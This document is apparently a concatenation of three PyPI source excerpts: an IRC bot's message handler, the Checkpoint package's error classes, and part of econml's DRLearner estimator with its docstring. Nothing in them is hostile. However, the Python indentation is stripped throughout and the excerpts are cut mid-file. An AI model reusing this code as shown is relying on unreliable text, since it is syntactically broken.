| If the command is used more than `limit` times in a
| minute, ignore the nick.
"""
if nick not in self.abuselist:
self.abuselist[nick] = {}
if cmd not in self.abuselist[nick]:
self.abuselist[nick][cmd] = [datetime.now()]
else:
self.abuselist[nick][cmd].append(datetime.now())
count = 0
for x in self.abuselist[nick][cmd]:
# 60 seconds - arbitrary cuttoff
if datetime.now() - x < timedelta(seconds=60):
count = count + 1
if count > limit:
msg = "%s: don't abuse scores!" if cmd == 'scores' else "%s: stop abusing the bot!"
send(msg % nick, target=target)
with self.db.session_scope() as session:
send(misc.ignore(session, nick))
return True
@staticmethod
def get_max_length(target, msgtype):
overhead = r"PRIVMSG %s: \r\n" % target
# FIXME: what the hell is up w/ message length limits?
if msgtype == 'action':
overhead += "\001ACTION \001"
max_len = 454 # 512
else:
max_len = 453 # 512
return max_len - len(overhead.encode())
def send(self, target, nick, msg: str, msgtype, ignore_length=False, filters=None):
"""Send a message.
Records the message in the log.
"""
if not isinstance(msg, str):
raise Exception("Trying to send a %s to irc, only strings allowed." % type(msg).__name__)
msgs = []
if filters is None:
filters = self.outputfilter[target]
for i in filters:
if target != self.config['core']['ctrlchan']:
msg = i(msg)
# Avoid spam from commands that produce excessive output.
max_len = 650
msg_enc = [x.encode() for x in msg]
if sum(map(len, msg_enc)) > max_len and not ignore_length:
msg, _ = misc.split_msg(msg_enc, max_len)
msg += "..."
msg_enc = [x.encode() for x in msg]
max_len = self.get_max_length(target, msgtype)
# We can't send messages > 512 bytes to irc.
while sum(map(len, msg_enc)) > max_len:
split, msg_enc = misc.split_msg(msg_enc, max_len)
msgs.append(split)
msgs.append(''.join([x.decode() for x in msg_enc]).strip())
for i in msgs:
self.do_log(target, nick, i, msgtype)
if msgtype == 'action':
self.rate_limited_send('action', target, i)
else:
self.rate_limited_send('privmsg', target, i)
def rate_limited_send(self, mtype, target, msg=None):
with self.flood_lock:
elapsed = datetime.now() - self.last_msg_time
# Don't send messages more then once every 0.5 sec.
time.sleep(max(0, 0.5 - elapsed.total_seconds()))
if msg is None:
getattr(self.connection, mtype)(target)
else:
getattr(self.connection, mtype)(target, msg)
self.last_msg_time = datetime.now()
def do_log(self, target, nick, msg, msgtype):
"""Handles logging.
| Logs to a sql db.
"""
if not isinstance(msg, str):
raise Exception("IRC doesn't like it when you send it a %s" % type(msg).__name__)
target = target.lower()
flags = 0
# Properly handle /msg +#channel
if target.startswith(('+', '@')):
target = target[1:]
with self.data_lock:
if target in self.channels:
if self.opers[target].get(nick, False):
flags |= 1
if self.voiced[target].get(nick, False):
flags |= 2
else:
target = 'private'
# FIXME: should we special-case this?
# strip ctrl chars from !creffett
msg = msg.replace('\x02\x038,4', '<rage>')
self.db.log(nick, target, flags, msg, msgtype)
if self.log_to_ctrlchan:
ctrlchan = self.config['core']['ctrlchan']
if target != ctrlchan:
ctrlmsg = "%s:%s:%s:%s" % (target, msgtype, nick, msg)
# If we call self.send, we'll get a infinite loop.
self.connection.privmsg(ctrlchan, ctrlmsg.strip())
def do_part(self, cmdargs, nick, target, msgtype, send, c):
"""Leaves a channel.
Prevent user from leaving the primary channel.
"""
channel = self.config['core']['channel']
botnick = self.config['core']['nick']
if not cmdargs:
# don't leave the primary channel
if target == channel:
send("%s must have a home." % botnick)
return
else:
cmdargs = target
if not cmdargs.startswith(('#', '+', '@')):
cmdargs = '#' + cmdargs
# don't leave the primary channel
if cmdargs == channel:
send("%s must have a home." % botnick)
return
# don't leave the control channel
if cmdargs == self.config['core']['ctrlchan']:
send("%s must remain under control, or bad things will happen." % botnick)
return
self.send(cmdargs, nick, "Leaving at the request of %s" % nick, msgtype)
c.part(cmdargs)
def do_join(self, cmdargs, nick, msgtype, send, c):
"""Join a channel.
| Checks if bot is already joined to channel.
"""
if not cmdargs:
send("Join what?")
return
if cmdargs == '0':
send("I'm sorry, Dave. I'm afraid I can't do that.")
return
if not cmdargs.startswith(('#', '+', '@')):
cmdargs = '#' + cmdargs
cmd = cmdargs.split()
# FIXME: use argparse
if cmd[0] in self.channels and not (len(cmd) > 1 and cmd[1] == "force"):
send("%s is already a member of %s" % (self.config['core']['nick'], cmd[0]))
return
c.join(cmd[0])
self.send(cmd[0], nick, "Joined at the request of " + nick, msgtype)
def check_mode(self, mode):
if mode[2] != self.connection.real_nickname:
return False
if (mode[0], mode[1]) == ('-', 'o'):
return True
elif (mode[0], mode[1]) == ('+', 'b'):
return True
return False
def do_mode(self, target, msg, nick, send):
"""reop and handle guard violations."""
mode_changes = modes.parse_channel_modes(msg)
with self.data_lock:
for change in mode_changes:
if change[1] == 'v':
self.voiced[target][change[2]] = True if change[0] == '+' else False
if change[1] == 'o':
self.opers[target][change[2]] = True if change[0] == '+' else False
# reop
# FIXME: handle -o+o msbobBot msbobBot
if [x for x in mode_changes if self.check_mode(x)]:
send("%s: :(" % nick, target=target)
# Assume bot admins know what they're doing.
if not self.is_admin(None, nick):
send("OP %s" % target, target='ChanServ')
send("UNBAN %s" % target, target='ChanServ')
if len(self.guarded) > 0:
# if user is guarded and quieted, devoiced, or deopped, fix that
regex = r"(.*(-v|-o|\+q|\+b)[^ ]*) (%s)" % "|".join(self.guarded)
match = re.search(regex, msg)
if match and nick not in [match.group(3), self.connection.real_nickname]:
modestring = "+voe-qb %s" % (" ".join([match.group(3)] * 5))
self.connection.mode(target, modestring)
send('Mode %s on %s by the guard system' % (modestring, target), target=self.config['core']['ctrlchan'])
def do_kick(self, send, target, nick, msg, slogan=True):
"""Kick users.
- If kick is disabled, don't do anything.
- If the bot is not a op, rage at a op.
- Kick the user.
"""
if not self.kick_enabled:
return
if target not in self.channels:
send("%s: you're lucky, private message kicking hasn't been implemented yet." % nick)
return
with self.data_lock:
ops = [k for k, v in self.opers[target].items() if v]
botnick = self.config['core']['nick']
if botnick not in ops:
ops = ['someone'] if not ops else ops
send(textutils.gen_creffett("%s: /op the bot" % random.choice(ops)), target=target)
elif random.random() < 0.01 and msg == "shutting caps lock off":
if nick in ops:
send("%s: HUEHUEHUE GIBE CAPSLOCK PLS I REPORT U" % nick, target=target)
else:
self.connection.kick(target, nick, "HUEHUEHUE GIBE CAPSLOCK PLS I REPORT U")
else:
msg = textutils.gen_slogan(msg).upper() if slogan else msg
if nick in ops:
send("%s: %s" % (nick, msg), target=target)
else:
self.connection.kick(target, nick, msg)
def do_args(self, modargs, send, nick, target, source, name, msgtype):
"""Handle the various args that modules need."""
realargs = {}
args = {'nick': nick,
'handler': self,
'db': None,
'config': self.config,
'source': source,
'name': name,
'type': msgtype,
'botnick': self.connection.real_nickname,
'target': target if target[0] == "#" else "private",
'do_kick': lambda target, nick, msg: self.do_kick(send, target, nick, msg),
'is_admin': lambda nick: self.is_admin(send, nick),
'abuse': lambda nick, limit, cmd: self.abusecheck(send, nick, target, limit, cmd)}
for arg in modargs:
if arg in args:
realargs[arg] = args[arg]
else:
raise Exception("Invalid Argument: %s" % arg)
return realargs
def do_welcome(self):
"""Do setup when connected to server.
- Join the primary channel.
- Join the control channel.
"""
self.rate_limited_send('join', self.config['core']['channel'])
self.rate_limited_send('join', self.config['core']['ctrlchan'], self.config['auth']['ctrlkey'])
# We use this to pick up info on admins who aren't currently in a channel.
self.workers.defer(5, False, self.get_admins)
extrachans = self.config['core']['extrachans']
if extrachans:
for chan in [x.strip() for x in extrachans.split(',')]:
self.rate_limited_send('join', chan)
def is_ignored(self, nick):
with self.db.session_scope() as session:
return session.query(orm.Ignore).filter(orm.Ignore.nick == nick).count()
def get_filtered_send(self, cmdargs, send, target):
"""Parse out any filters."""
parser = arguments.ArgParser(self.config)
parser.add_argument('--filter')
try:
filterargs, remainder = parser.parse_known_args(cmdargs)
except arguments.ArgumentException as ex:
return str(ex), None
cmdargs = ' '.join(remainder)
if filterargs.filter is None:
return cmdargs, send
filter_list, output = textutils.append_filters(filterargs.filter)
if filter_list is None:
return output, None
# define a new send to handle filter chaining
def filtersend(msg, mtype='privmsg', target=target, ignore_length=False):
self.send(target, self.connection.real_nickname, msg, mtype, ignore_length, filters=filter_list)
return cmdargs, filtersend
def do_rejoin(self, c, e):
# If we're still banned, this will trigger a bannedfromchan event so we'll try again.
if e.arguments[0] not in self.channels:
c.join(e.arguments[0])
def handle_event(self, msg, send, c, e):
if e.type == 'whospcrpl':
self.handle_who(e)
elif e.type == 'account':
self.handle_account(e)
elif e.type == 'authenticate':
self.handle_authenticate(e)
elif e.type == 'bannedfromchan':
self.workers.defer(5, False, self.do_rejoin, c, e)
elif e.type == 'cap':
self.handle_cap(e)
elif e.type in ['ctcpreply', 'nosuchnick']:
misc.ping(self.ping_map, c, e, datetime.now())
elif e.type == 'error':
logger.error(e.target)
elif e.type == 'featurelist':
if 'WHOX' in e.arguments:
self.features['whox'] = True
elif e.type == 'nick':
self.handle_nick(send, e)
elif e.type == 'nicknameinuse':
self.connection.nick('Guest%d' % random.getrandbits(20))
elif e.type == 'privnotice':
if e.source.nick == 'NickServ':
# FIXME: don't pass self
acl.set_admin(msg, self)
elif e.type == 'welcome':
self.handle_welcome()
def handle_authenticate(self, e):
passwd = self.config['auth']['serverpass']
user = self.config['core']['nick']
if e.target == '+':
token = base64.b64encode('\0'.join([user, user, passwd]).encode())
self.connection.send_raw('AUTHENTICATE %s' % token.decode())
self.connection.cap('END')
def handle_account(self, e):
with self.db.session_scope() as session:
admin = session.query(orm.Permissions).filter(orm.Permissions.nick == e.source.nick).first()
if admin is not None:
if e.target == '*':
admin.registered = False
else:
admin.registered = True
admin.time = datetime.now()
def handle_welcome(self):
passwd = self.config['auth']['serverpass']
user = self.config['core']['nick']
logger.info("Connected to server %s", self.config['core']['host'])
if self.config.getboolean('feature', 'nickserv') and self.connection.real_nickname != self.config['core']['nick']:
self.connection.privmsg('NickServ', 'REGAIN %s %s' % (user, passwd))
self.do_welcome()
def handle_who(self, e):
# arguments: tag,nick,modes,account
# modes = H(here) or G(away), +(voice), @(oper)
# account is the nicksev account if authed, else 0
# properly track voiced status.
location = self.who_map[int(e.arguments[0])]
# FIXME: devoice if G in modes
self.voiced[location][e.arguments[1]] = '+' in e.arguments[2]
self.opers[location][e.arguments[1]] = '@' in e.arguments[2]
with self.db.session_scope() as session:
admin = session.query(orm.Permissions).filter(orm.Permissions.nick == e.arguments[1]).first()
if admin is not None:
if e.arguments[3] != '0':
admin.registered = True
admin.time = datetime.now()
def handle_cap(self, e):
if e.arguments[0] == 'ACK':
if e.arguments[1].strip() == 'sasl':
self.connection.send_raw('AUTHENTICATE PLAIN')
elif e.arguments[1].strip() == 'account-notify':
self.features['account-notify'] = True
elif e.arguments[1].strip() == 'extended-join':
self.features['extended-join'] = True
def handle_nick(self, send, e):
with self.data_lock:
for channel in misc.get_channels(self.channels, e.target):
self.do_log(channel, e.source.nick, e.target, 'nick')
# Move the voice+op status to the new nick
if e.source.nick in self.voiced[channel].keys(): # In case we somehow didn't set the voice state on the old nick
self.voiced[channel][e.target] = self.voiced[channel].pop(e.source.nick)
if e.source.nick in self.opers[channel].keys(): # As above, for ops
self.opers[channel][e.target] = self.opers[channel].pop(e.source.nick)
if identity.handle_nick(self, e):
for x in misc.get_channels(self.channels, e.target):
self.do_kick(send, x, e.target, "identity crisis")
def handle_join(self, c, e, target, send):
# Get status for all nicks in-channel when we join, or the new nick when somebody else joins.
if self.features['whox']:
tag = random.randint(0, 999)
self.who_map[tag] = target
if e.source.nick == c.real_nickname:
self.send_who(target, tag)
else:
self.send_who(e.source.nick, tag)
if e.source.nick == c.real_nickname:
send("Joined channel %s" % target, target=self.config['core']['ctrlchan'])
elif self.features['extended-join']:
with self.db.session_scope() as session:
admin = session.query(orm.Permissions).filter(orm.Permissions.nick == e.source.nick).first()
if admin is not None:
if e.arguments[0] == '*':
admin.registered = False
else:
admin.registered = True
admin.time = datetime.now()
def get_cmd(self, msg):
cmd = msg.split()[0]
cmdchar = self.config['core']['cmdchar']
cmdlen = len(cmd) + 1
# FIXME: figure out a better way to handle !s
if cmd.startswith('%ss' % cmdchar):
# escape special regex chars
raw_cmdchar = '\\' + cmdchar if re.match(r'[\[\].^$*+?]', cmdchar) else cmdchar
match = re.match(r'%ss(\W)' % raw_cmdchar, cmd)
if match:
cmd = cmd.split(match.group(1))[0]
cmdlen = len(cmd)
cmdargs = msg[cmdlen:]
cmd_name = cmd[len(cmdchar):].lower() if cmd.startswith(cmdchar) else None
return cmd_name, cmdargs
def run_cmd(self, send, nick, target, cmd_name, cmdargs, e):
cmdargs, filtersend = self.get_filtered_send(cmdargs, send, target)
if filtersend is None:
send(cmdargs)
return
cmd_obj = registry.command_registry.get_command(cmd_name)
if cmd_obj.is_limited() and self.abusecheck(send, nick, target, cmd_obj.limit, cmd_name):
return
with self.db.session_scope() as session:
if not cmd_obj.has_role(session, nick):
send("Insufficent privileges for command.")
return
args = self.do_args(cmd_obj.args, send, nick, target, e.source, cmd_name, e.type)
cmd_obj.run(filtersend, cmdargs, args, cmd_name, nick, target, self)
def handle_kick(self, c, e, target, send):
if e.arguments[0] == c.real_nickname:
send("Kicked from channel %s" % target, target=self.config['core']['ctrlchan'])
# Auto-rejoin after 5 seconds.
self.workers.defer(5, False, self.connection.join, target)
def handle_hooks(self, send, nick, target, e, msg):
if self.config['feature'].getboolean('hooks'):
for h in registry.hook_registry.get_hook_objects():
realargs = self.do_args(h.args, send, nick, target, e.source, h, e.type)
h.run(send, msg, e.type, self, target, realargs)
def handle_msg(self, c, e):
"""The Heart and Soul of IrcBot."""
if e.type not in ['authenticate', 'error', 'join', 'part', 'quit']:
nick = e.source.nick
else:
nick = e.source
if e.arguments is None:
msg = ""
else:
msg = " ".join(e.arguments).strip()
# Send the response to private messages to the sending nick.
target = nick if e.type == 'privmsg' else e.target
def send(msg, mtype='privmsg', target=target, ignore_length=False):
self.send(target, self.connection.real_nickname, msg, mtype, ignore_length)
if e.type in ['account', 'authenticate', 'bannedfromchan', 'cap', 'ctcpreply', 'error', 'featurelist', 'nosuchnick', 'nick', 'nicknameinuse',
'privnotice', 'welcome', 'whospcrpl']:
self.handle_event(msg, send, c, e)
return
# ignore empty messages
if not msg and e.type != 'join':
return
self.do_log(target, nick, msg, e.type)
if e.type == 'mode':
self.do_mode(target, msg, nick, send)
return
if e.type == 'join':
self.handle_join(c, e, target, send)
return
if e.type == 'part':
if nick == c.real_nickname:
send("Parted channel %s" % target, target=self.config['core']['ctrlchan'])
return
if e.type == 'kick':
self.handle_kick(c, e, target, send)
return
if e.target == self.config['core']['ctrlchan'] and self.is_admin(None, nick):
control.handle_ctrlchan(self, msg, send)
if self.is_ignored(nick) and not self.is_admin(None, nick):
return
self.handle_hooks(send, nick, target, e, msg)
msg = misc.get_cmdchar(self.config, c, msg, e.type)
cmd_name, cmdargs = self.get_cmd(msg)
if registry.command_registry.is_registered(cmd_name):
self.run_cmd(send, nick, target, cmd_name, cmdargs, e)
# special commands
elif cmd_name == 'reload':
with self.db.session_scope() as session:
if session.query(orm.Permissions).filter(orm.Permissions.nick == nick).count():
send("Aye Aye Capt'n") | PypiClean |
/Checkpoint-0.2b1.tar.gz/Checkpoint-0.2b1/checkpoint/error.py |
from textwrap import dedent
from traceback import format_stack
__all__ = [
'NoChanges', 'CheckpointBug', 'CheckpointError', 'RepositoryLocked',
'NotFound', 'InvalidCommand', 'FileError', 'RepositoryError',
'UnsupportedFileType', 'VersionError', 'UninitializedRepositoryError',
'MirrorLocked', 'PropertyNotFound'
]
class CheckpointError(Exception):
"""Base class for anticipated errors in the checkpoint package"""
def __init__(self, message=None):
self.message = message
if self.message is None:
self.message = dedent(self.__class__.__doc__)
def __str__(self):
return getattr(self, 'message', '')
class CheckpointBug(CheckpointError):
"""Error indicates a bug in the checkpoint API"""
def __init__(self, message=""):
self.message = (
"Unrecoverable Error!\n" + message + "\n" +
("Traceback (most recent call last):\n%s" % format_stack()) +
dedent("""
This could be a bug in Checkpoint.
Please report this bug as described at
http://something something something....
""")
)
def __str__(self):
return getattr(self, 'message', '')
class RepositoryLocked(CheckpointError):
"""Repository is locked."""
def __init__(self):
self.message = dedent("""
--------------------------------------------------------------
!!! Repository is Locked! !!!
This could be because another process has the repository open.
Most likely though, it means the last repository command has
failed or crashed, leaving the repository dirty. Try the
'recover' command to attempt to fix the repository. If that
doesn't work, manual crash-recovery may be the only option.
Check the documentation for more information.
--------------------------------------------------------------
""")
class MirrorLocked(CheckpointError):
"""Mirror is locked."""
def __init__(self):
self.message = dedent("""
--------------------------------------------------------------
!!! Mirror is Locked! !!!
This could be because another process has the mirror open.
Most likely though, it means the last mirror command has
failed or crashed, leaving the mirror dirty. Try the
'recover' command to attempt to fix the mirror. If that
doesn't work, manual crash-recovery may be the only option.
Check the documentation for more information.
--------------------------------------------------------------
""")
class NoChanges(CheckpointError):
"""Indicates no changes were made to repository or directory"""
class NotFound(CheckpointError):
"""Specified file or directory does not exist."""
def __init__(self, path):
self.message = "File or directory not found: %r" % path
class PropertyNotFound(CheckpointError):
"""Specified property does not exist on specified path."""
def __init__(self, propname, path):
self.message = "Property %r not found on %r" % (propname, path)
class InvalidCommand(CheckpointError):
"""Specified command is not a valid Checkpoint command."""
class FileError(CheckpointError):
"""File operation error - error during rm, copy, mv, etc."""
class RepositoryError(CheckpointError):
"""Repository operation error - error during read, write, or create."""
class UninitializedRepositoryError(CheckpointError):
"""Repository must be initialized for this operation to succeed."""
class UninitializedMirrorError(CheckpointError):
"""Mirror must be initialized for this operation to succeed."""
class UnsupportedFileType(CheckpointError):
"""Unsupported file type (link, socket, pipe, device) was encountered."""
def __init__(self, path):
self.message = "Unsupported file type: %r" % path
class VersionError(CheckpointError):
"""Repository format is incompatible with this version of Checkpoint.""" | PypiClean |
/BEATAALU-0.13.1.tar.gz/BEATAALU-0.13.1/econml/dr/_drlearner.py | from warnings import warn
from copy import deepcopy
import numpy as np
from sklearn.base import clone
from sklearn.linear_model import (LassoCV, LinearRegression,
LogisticRegressionCV)
from sklearn.ensemble import RandomForestRegressor
from .._ortho_learner import _OrthoLearner
from .._cate_estimator import (DebiasedLassoCateEstimatorDiscreteMixin,
ForestModelFinalCateEstimatorDiscreteMixin,
StatsModelsCateEstimatorDiscreteMixin, LinearCateEstimator)
from ..inference import GenericModelFinalInferenceDiscrete
from ..grf import RegressionForest
from ..sklearn_extensions.linear_model import (
DebiasedLasso, StatsModelsLinearRegression, WeightedLassoCVWrapper)
from ..utilities import (_deprecate_positional, check_high_dimensional,
filter_none_kwargs, fit_with_groups, inverse_onehot, get_feature_names_or_default)
from .._shap import _shap_explain_multitask_model_cate, _shap_explain_model_cate
class _ModelNuisance:
def __init__(self, model_propensity, model_regression, min_propensity):
self._model_propensity = model_propensity
self._model_regression = model_regression
self._min_propensity = min_propensity
def _combine(self, X, W):
return np.hstack([arr for arr in [X, W] if arr is not None])
def fit(self, Y, T, X=None, W=None, *, sample_weight=None, groups=None):
if Y.ndim != 1 and (Y.ndim != 2 or Y.shape[1] != 1):
raise ValueError("The outcome matrix must be of shape ({0}, ) or ({0}, 1), "
"instead got {1}.".format(len(X), Y.shape))
if (X is None) and (W is None):
raise AttributeError("At least one of X or W has to not be None!")
if np.any(np.all(T == 0, axis=0)) or (not np.any(np.all(T == 0, axis=1))):
raise AttributeError("Provided crossfit folds contain training splits that " +
"don't contain all treatments")
XW = self._combine(X, W)
filtered_kwargs = filter_none_kwargs(sample_weight=sample_weight)
fit_with_groups(self._model_propensity, XW, inverse_onehot(T), groups=groups, **filtered_kwargs)
fit_with_groups(self._model_regression, np.hstack([XW, T]), Y, groups=groups, **filtered_kwargs)
return self
def score(self, Y, T, X=None, W=None, *, sample_weight=None, groups=None):
XW = self._combine(X, W)
filtered_kwargs = filter_none_kwargs(sample_weight=sample_weight)
if hasattr(self._model_propensity, 'score'):
propensity_score = self._model_propensity.score(XW, inverse_onehot(T), **filtered_kwargs)
else:
propensity_score = None
if hasattr(self._model_regression, 'score'):
regression_score = self._model_regression.score(np.hstack([XW, T]), Y, **filtered_kwargs)
else:
regression_score = None
return propensity_score, regression_score
def predict(self, Y, T, X=None, W=None, *, sample_weight=None, groups=None):
XW = self._combine(X, W)
propensities = np.maximum(self._model_propensity.predict_proba(XW), self._min_propensity)
n = T.shape[0]
Y_pred = np.zeros((T.shape[0], T.shape[1] + 1))
T_counter = np.zeros(T.shape)
Y_pred[:, 0] = self._model_regression.predict(np.hstack([XW, T_counter])).reshape(n)
Y_pred[:, 0] += (Y.reshape(n) - Y_pred[:, 0]) * np.all(T == 0, axis=1) / propensities[:, 0]
for t in np.arange(T.shape[1]):
T_counter = np.zeros(T.shape)
T_counter[:, t] = 1
Y_pred[:, t + 1] = self._model_regression.predict(np.hstack([XW, T_counter])).reshape(n)
Y_pred[:, t + 1] += (Y.reshape(n) - Y_pred[:, t + 1]) * (T[:, t] == 1) / propensities[:, t + 1]
T_complete = np.hstack(((np.all(T == 0, axis=1) * 1).reshape(-1, 1), T))
propensities_weight = np.sum(propensities * T_complete, axis=1)
return Y_pred.reshape(Y.shape + (T.shape[1] + 1,)), propensities_weight.reshape((n,))
class _ModelFinal:
# Coding Remark: The reasoning around the multitask_model_final could have been simplified if
# we simply wrapped the model_final with a MultiOutputRegressor. However, because we also want
# to allow even for model_final objects whose fit(X, y) can accept X=None
# (e.g. the StatsModelsLinearRegression), we cannot take that route, because the MultiOutputRegressor
# checks that X is 2D array.
def __init__(self, model_final, featurizer, multitask_model_final):
self._model_final = clone(model_final, safe=False)
self._featurizer = clone(featurizer, safe=False)
self._multitask_model_final = multitask_model_final
return
def fit(self, Y, T, X=None, W=None, *, nuisances,
sample_weight=None, freq_weight=None, sample_var=None, groups=None):
Y_pred, propensities = nuisances
self.d_y = Y_pred.shape[1:-1] # track whether there's a Y dimension (must be a singleton)
self.d_t = Y_pred.shape[-1] - 1 # track # of treatment (exclude baseline treatment)
if (X is not None) and (self._featurizer is not None):
X = self._featurizer.fit_transform(X)
if self._multitask_model_final:
ys = Y_pred[..., 1:] - Y_pred[..., [0]] # subtract control results from each other arm
if self.d_y: # need to squeeze out singleton so that we fit on 2D array
ys = ys.squeeze(1)
weighted_sample_var = np.tile((sample_var / propensities**2).reshape((-1, 1)),
self.d_t) if sample_var is not None else None
filtered_kwargs = filter_none_kwargs(sample_weight=sample_weight,
freq_weight=freq_weight, sample_var=weighted_sample_var)
self.model_cate = self._model_final.fit(X, ys, **filtered_kwargs)
else:
weighted_sample_var = sample_var / propensities**2 if sample_var is not None else None
filtered_kwargs = filter_none_kwargs(sample_weight=sample_weight,
freq_weight=freq_weight, sample_var=weighted_sample_var)
self.models_cate = [clone(self._model_final, safe=False).fit(X, Y_pred[..., t] - Y_pred[..., 0],
**filtered_kwargs)
for t in np.arange(1, Y_pred.shape[-1])]
return self
def predict(self, X=None):
if (X is not None) and (self._featurizer is not None):
X = self._featurizer.transform(X)
if self._multitask_model_final:
pred = self.model_cate.predict(X).reshape((-1, self.d_t))
if self.d_y: # need to reintroduce singleton Y dimension
return pred[:, np.newaxis, :]
return pred
else:
preds = np.array([mdl.predict(X).reshape((-1,) + self.d_y) for mdl in self.models_cate])
return np.moveaxis(preds, 0, -1) # move treatment dim to end
def score(self, Y, T, X=None, W=None, *, nuisances, sample_weight=None, groups=None):
if (X is not None) and (self._featurizer is not None):
X = self._featurizer.transform(X)
Y_pred, _ = nuisances
if self._multitask_model_final:
Y_pred_diff = Y_pred[..., 1:] - Y_pred[..., [0]]
cate_pred = self.model_cate.predict(X).reshape((-1, self.d_t))
if self.d_y:
cate_pred = cate_pred[:, np.newaxis, :]
return np.mean(np.average((Y_pred_diff - cate_pred)**2, weights=sample_weight, axis=0))
else:
scores = []
for t in np.arange(1, Y_pred.shape[-1]):
# since we only allow single dimensional y, we could flatten the prediction
Y_pred_diff = (Y_pred[..., t] - Y_pred[..., 0]).flatten()
cate_pred = self.models_cate[t - 1].predict(X).flatten()
score = np.average((Y_pred_diff - cate_pred)**2, weights=sample_weight, axis=0)
scores.append(score)
return np.mean(scores)
class DRLearner(_OrthoLearner):
"""
CATE estimator that uses doubly-robust correction techniques to account for
covariate shift (selection bias) between the treatment arms. The estimator is a special
case of an :class:`._OrthoLearner` estimator, so it follows the two
stage process, where a set of nuisance functions are estimated in the first stage in a crossfitting
manner and a final stage estimates the CATE model. See the documentation of
:class:`._OrthoLearner` for a description of this two stage process.
In this estimator, the CATE is estimated by using the following estimating equations. If we let:
.. math ::
Y_{i, t}^{DR} = E[Y | X_i, W_i, T_i=t]\
+ \\frac{Y_i - E[Y | X_i, W_i, T_i=t]}{Pr[T_i=t | X_i, W_i]} \\cdot 1\\{T_i=t\\}
Then the following estimating equation holds:
.. math ::
E\\left[Y_{i, t}^{DR} - Y_{i, 0}^{DR} | X_i\\right] = \\theta_t(X_i)
Thus if we estimate the nuisance functions :math:`h(X, W, T) = E[Y | X, W, T]` and
:math:`p_t(X, W)=Pr[T=t | X, W]` in the first stage, we can estimate the final stage cate for each
treatment t, by running a regression, regressing :math:`Y_{i, t}^{DR} - Y_{i, 0}^{DR}` on :math:`X_i`.
The problem of estimating the nuisance function :math:`p` is a simple multi-class classification
problem of predicting the label :math:`T` from :math:`X, W`. The :class:`.DRLearner`
class takes as input the parameter ``model_propensity``, which is an arbitrary scikit-learn
classifier, that is internally used to solve this classification problem.
The second nuisance function :math:`h` is a simple regression problem and the :class:`.DRLearner`
class takes as input the parameter ``model_regressor``, which is an arbitrary scikit-learn regressor that
is internally used to solve this regression problem.
The final stage is multi-task regression problem with outcomes the labels :math:`Y_{i, t}^{DR} - Y_{i, 0}^{DR}`
for each non-baseline treatment t. The :class:`.DRLearner` takes as input parameter
``model_final``, which is any scikit-learn regressor that is internally used to solve this multi-task
regresion problem. If the parameter ``multitask_model_final`` is False, then this model is assumed
to be a mono-task regressor, and separate clones of it are used to solve each regression target
separately.
Parameters
----------
model_propensity : scikit-learn classifier or 'auto', optional (default='auto')
Estimator for Pr[T=t | X, W]. Trained by regressing treatments on (features, controls) concatenated.
Must implement `fit` and `predict_proba` methods. The `fit` method must be able to accept X and T,
where T is a shape (n, ) array.
If 'auto', :class:`~sklearn.linear_model.LogisticRegressionCV` will be chosen.
model_regression : scikit-learn regressor or 'auto', optional (default='auto')
Estimator for E[Y | X, W, T]. Trained by regressing Y on (features, controls, one-hot-encoded treatments)
concatenated. The one-hot-encoding excludes the baseline treatment. Must implement `fit` and
`predict` methods. If different models per treatment arm are desired, see the
:class:`.MultiModelWrapper` helper class.
If 'auto' :class:`.WeightedLassoCV`/:class:`.WeightedMultiTaskLassoCV` will be chosen.
model_final :
estimator for the final cate model. Trained on regressing the doubly robust potential outcomes
on (features X).
- If X is None, then the fit method of model_final should be able to handle X=None.
- If featurizer is not None and X is not None, then it is trained on the outcome of
featurizer.fit_transform(X).
- If multitask_model_final is True, then this model must support multitasking
and it is trained by regressing all doubly robust target outcomes on (featurized) features simultanteously.
- The output of the predict(X) of the trained model will contain the CATEs for each treatment compared to
baseline treatment (lexicographically smallest). If multitask_model_final is False, it is assumed to be a
mono-task model and a separate clone of the model is trained for each outcome. Then predict(X) of the t-th
clone will be the CATE of the t-th lexicographically ordered treatment compared to the baseline.
multitask_model_final : bool, optional, default False
Whether the model_final should be treated as a multi-task model. See description of model_final.
featurizer : :term:`transformer`, optional, default None
Must support fit_transform and transform. Used to create composite features in the final CATE regression.
It is ignored if X is None. The final CATE will be trained on the outcome of featurizer.fit_transform(X).
If featurizer=None, then CATE is trained on X.
min_propensity : float, optional, default ``1e-6``
The minimum propensity at which to clip propensity estimates to avoid dividing by zero.
categories: 'auto' or list, default 'auto'
The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
The first category will be treated as the control treatment.
cv: int, cross-validation generator or an iterable, optional (default is 2)
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- :term:`CV splitter`
- An iterable yielding (train, test) splits as arrays of indices.
For integer/None inputs, if the treatment is discrete
:class:`~sklearn.model_selection.StratifiedKFold` is used, else,
:class:`~sklearn.model_selection.KFold` is used
(with a random shuffle in either case).
Unless an iterable is used, we call `split(concat[W, X], T)` to generate the splits. If all
W, X are None, then we call `split(ones((T.shape[0], 1)), T)`.
mc_iters: int, optional (default=None)
The number of times to rerun the first stage models to reduce the variance of the nuisances.
mc_agg: {'mean', 'median'}, optional (default='mean')
How to aggregate the nuisance value for each sample across the `mc_iters` monte carlo iterations of
cross-fitting.
random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None
If int, random_state is the seed used by the random number generator;
If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
by :mod:`np.random<numpy.random>`.
Examples
--------
A simple example with the default models:
.. testcode::
:hide:
import numpy as np
import scipy.special
np.set_printoptions(suppress=True)
.. testcode::
from econml.dr import DRLearner
np.random.seed(123)
X = np.random.normal(size=(1000, 3))
T = np.random.binomial(2, scipy.special.expit(X[:, 0]))
sigma = 0.001
y = (1 + .5*X[:, 0]) * T + X[:, 0] + np.random.normal(0, sigma, size=(1000,))
est = DRLearner()
est.fit(y, T, X=X, W=None)
>>> est.const_marginal_effect(X[:2])
array([[0.511640..., 1.144004...],
[0.378140..., 0.613143...]])
>>> est.effect(X[:2], T0=0, T1=1)
array([0.511640..., 0.378140...])
>>> est.score_
5.11238581...
>>> est.score(y, T, X=X)
5.78673506...
>>> est.model_cate(T=1).coef_
array([0.434910..., 0.010226..., 0.047913...])
>>> est.model_cate(T=2).coef_
array([ 0.863723..., 0.086946..., -0.022288...])
>>> est.cate_feature_names()
['X0', 'X1', 'X2']
>>> [mdl.coef_ for mdls in est.models_regression for mdl in mdls]
